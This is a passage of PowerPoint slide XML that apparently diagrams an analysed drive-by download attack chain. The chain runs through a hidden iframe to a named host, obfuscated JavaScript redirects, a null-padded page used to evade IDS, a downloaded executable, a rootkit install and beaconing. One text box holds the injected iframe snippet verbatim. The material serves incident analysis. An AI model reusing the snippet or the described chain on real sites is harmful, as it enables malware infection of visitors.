          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="2349500"/>
            <a:ext cx="85725" cy="927100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2107" name="AutoShape 59"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2109" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4524375" y="609600"/>
            <a:ext cx="9525" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2109" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="241300"/>
            <a:ext cx="1447800" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe src=http://gallyz.com/andyower.htm width=0 height=0&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2110" name="Object 62"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8286750" y="2362200"/>
          <a:ext cx="400050" cy="361950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2136" name="Visio" r:id="rId18" imgW="1752600" imgH="1473200" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2111" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="819150"/>
            <a:ext cx="914400" cy="4603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Obfuscated javascript redirects to host on 3322.org domain loading web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2112" name="AutoShape 64"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2111" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8486775" y="1279525"/>
            <a:ext cx="47625" cy="1082675"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2114" name="AutoShape 66"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2111" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7010400" y="423863"/>
            <a:ext cx="1066800" cy="625475"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2116" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4384675"/>
            <a:ext cx="1295400" cy="64452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Xtzj.htm is null padded, and uses the object html tag to “embed” the command to save icyfox.js to c:\foO.Mht.  This technique is commonly used for downloading trojan droppers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2117" name="AutoShape 69"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2116" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6524625" y="3638550"/>
            <a:ext cx="371475" cy="746125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2120" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="1873250"/>
            <a:ext cx="914400" cy="3683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VScript mmmmm.exe pulls down malcode and executes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2121" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="1841500"/>
            <a:ext cx="1066800" cy="3683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VScript mmmmm.gif which is a null padded file to evade IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2126" name="Text Box 78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2819400"/>
            <a:ext cx="1219200" cy="3683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ActiveX ADODB used to write hta to disk as boOt.bat used to download mmmmm.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2127" name="AutoShape 79"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2121" idx="2"/>
            <a:endCxn id="2126" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="2209800"/>
            <a:ext cx="0" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2129" name="Text Box 81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3657600"/>
            <a:ext cx="1219200" cy="4603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mmmmm.exe installs rootkit cctools32.exe and other files which are part of the GreyBird group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2130" name="AutoShape 82"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2129" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3429000" y="3887788"/>
            <a:ext cx="1260475" cy="1077912"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2131" name="Object 83"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2633663" y="457200"/>
          <a:ext cx="338137" cy="422275"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2137" name="Visio" r:id="rId19" imgW="1346200" imgH="1562100" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2132" name="Object 84"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2038350" y="990600"/>
          <a:ext cx="400050" cy="357188"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2138" name="Visio" r:id="rId20" imgW="1778000" imgH="1447800" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2133" name="Text Box 85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1905000"/>
            <a:ext cx="533400" cy="3683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Port 8000 outbound traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2134" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="1905000"/>
            <a:ext cx="762000" cy="32226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Port 80 Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>HTTP get request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2135" name="AutoShape 87"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2129" idx="0"/>
            <a:endCxn id="2134" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="2104231" y="2942432"/>
            <a:ext cx="1430337" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2140" name="Text Box 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1676400"/>
            <a:ext cx="990600" cy="32226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X-FORWARDED-FOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Proxy disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2141" name="AutoShape 93"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2140" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="647700" y="1998663"/>
            <a:ext cx="38100" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2211" name="Text Box 163"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1006475" y="3184525"/>
            <a:ext cx="457200"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Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2212" name="Text Box 164"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1006475" y="4098925"/>
            <a:ext cx="457200"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Targets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2213" name="Text Box 165"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1303792">
            <a:off x="1676400" y="4648200"/>
            <a:ext cx="5175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Retreived</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2214" name="Text Box 166"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4800600"/>
            <a:ext cx="5175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Disclosed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2215" name="Text Box 167"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="5670550"/>
            <a:ext cx="5175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Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2216" name="Text Box 168"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18425532">
            <a:off x="3948112" y="5348288"/>
            <a:ext cx="5175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Recipients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2217" name="Text Box 169"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3017621">
            <a:off x="5578475" y="5378451"/>
            <a:ext cx="5175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Tricked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2218" name="Text Box 170"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17500137">
            <a:off x="7910512" y="5805488"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2221" name="Text Box 173"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="8107362" y="4510088"/>
            <a:ext cx="5175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Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2222" name="Text Box 174"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="8139112" y="3138488"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2223" name="Text Box 175"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="8139112" y="1690688"/>
            <a:ext cx="5175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Method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2224" name="AutoShape 176"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2109" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5257800" y="423863"/>
            <a:ext cx="1349375" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2225" name="AutoShape 177"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2103" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6438900" y="609600"/>
            <a:ext cx="369888" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2226" name="AutoShape 178"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2099" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6808788" y="609600"/>
            <a:ext cx="781050" cy="1384300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2228" name="Text Box 180"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5581802">
            <a:off x="7377112" y="2909888"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2229" name="Text Box 181"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3684679">
            <a:off x="6794500" y="1206500"/>
            <a:ext cx="920750"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Information Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2230" name="Text Box 182"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6369335">
            <a:off x="6337300" y="1428750"/>
            <a:ext cx="615950"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Redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2232" name="Text Box 184"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5042125">
            <a:off x="6310312" y="2773363"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2233" name="Text Box 185"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3922811">
            <a:off x="6538912" y="3900488"/>
            <a:ext cx="5175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Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2234" name="Text Box 186"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2056037">
            <a:off x="5578475" y="3549650"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2235" name="AutoShape 187"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2116" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5105400" y="3244850"/>
            <a:ext cx="1790700" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2236" name="Text Box 188"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4329112" y="776288"/>
            <a:ext cx="5175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Location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2237" name="Text Box 189"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="273050"/>
            <a:ext cx="615950"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Redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2239" name="Text Box 191"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2591533">
            <a:off x="3756025" y="4311650"/>
            <a:ext cx="806450"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Malcode Executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2241" name="AutoShape 193"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2129" idx="0"/>
            <a:endCxn id="2133" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2247900" y="2273300"/>
            <a:ext cx="571500" cy="1384300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2245" name="AutoShape 197"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2082" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4038600" y="5822950"/>
